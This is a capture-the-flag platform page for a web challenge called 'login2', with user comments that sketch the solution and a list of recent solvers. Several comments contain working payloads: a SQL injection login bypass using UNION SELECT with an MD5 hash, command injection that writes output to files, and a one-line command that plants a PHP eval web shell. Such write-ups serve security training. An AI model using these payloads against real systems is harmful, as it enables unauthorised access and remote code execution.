login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2125
提  示: 命令执行
描  述:
login2
...
登录回复
评论
你文博哥哥 7天前
举报

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 0
一个姓⎝李⎠的师傅~ 11天前
举报

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 1
꧁༺༽༾ཊCCཏ༿༼༻꧂ 17天前
举报

没难度

回复 0
六分之杰 27天前
举报

https://zhuanlan.zhihu.com/p/7343164566

回复 0
D调丶Slayer 1月前
举报

https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501

回复 0
19957910119 1月前
举报

1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php

回复 0
ctfer-pls 1月前
举报

看了评论厉害了

回复 0
ilovevicky99 2月前
举报

用反弹shell的方法,为什么没有回显呀

回复 0
zhuizhui 2月前
举报

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0
nihaozy 4月前
举报

学会了一个英语单词tip提示

回复 1

WriteUp

image
harry

6 金币

立即查看

评分(8)

解题动态

yiwyiw 攻破了该题 2小时前
weiyouzhunze 攻破了该题 2小时前
TwangT 攻破了该题 14小时前
walkerming 攻破了该题 22小时前
yyt030 攻破了该题 1天前
爱吃馒头 攻破了该题 1天前
desireart 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
暗A166668 攻破了该题 2天前
geekhzy 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
wywsssf 攻破了该题 2天前
白六真的6 攻破了该题 2天前
alizee 攻破了该题 3天前
5326 攻破了该题 3天前
llq135136 攻破了该题 3天前
18469110745 攻破了该题 3天前
泡泡鱼 攻破了该题 3天前
凌晨3点的阳光 攻破了该题 4天前
问题反馈